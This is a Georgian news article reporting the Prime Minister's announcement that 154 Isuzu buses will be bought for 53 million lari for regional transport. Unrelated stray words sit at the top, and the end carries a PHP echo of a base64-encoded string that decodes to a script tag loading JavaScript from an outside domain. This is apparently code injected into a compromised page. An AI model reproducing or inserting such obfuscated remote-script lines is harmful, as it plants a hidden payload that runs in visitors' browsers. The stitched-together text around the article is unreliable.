celsiusi
ავერსი შნაიდერი

ჩვენ გადავწყვიტეთ 154 ახალი ავტობუსის შეძენა, რომლებშიც ჩვენ გადავიხდით 53 მილიონ ლარს, ეს იქნება 8-მეტრიანი Isuzu-ს მარკის თანამედროვე, ევრო 5-ის სტანდარტის ავტობუსები, რომლებიც რეგიონებში მცხოვრებ მოსახლეობას მოემსახურებიან, – ამის შესახებ საქართველოს პრემიერ-მინისტრმა, ირაკლი ღარიბაშვილმა მთავრობის სხდომაზე განაცხადა

პრემიერის თქმით, ახალი ავტობუსების შეძენა კიდევ უფრო კომფორტულს გახდის გადაადგილებას.

„კიდევ ერთი მნიშვნელოვანი პოზიტიური სიახლე, მინდა, ვაცნობო ჩვენს მოსახლეობას, განსაკუთრებით, რეგიონებში მცხოვრებ ჩვენს ხალხს. ჩვენ გადავწყვიტეთ 154 ახალი ავტობუსის შეძენა, რომლებშიც ჩვენ გადავიხდით 53 მილიონ ლარს. ეს იქნება 8-მეტრიანი Isuzu-ს მარკის თანამედროვე, ევრ ო5-ის სტანდარტის ავტობუსები, რომლებიც რეგიონებში მცხოვრებ მოსახლეობას მოემსახურებიან. წლების განმავლობაში, მოგეხსენებათ, რომ არსებული შიდა საქალაქო გადაადგილება იყო დაკავშირებული პრობლემებთან და ამიტომ ეს პროცესი მიმდინარეობს. ჩვენ კიდევ ვაპირებთ დამატებითი ავტობუსების შეძენას, რომ კიდევ უფრო მეტად კომფორტული იყოს გადაადგილება ჩვენი ხალხისთვის“, – განაცხადა ირაკლი ღარიბაშვილმა.

313
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");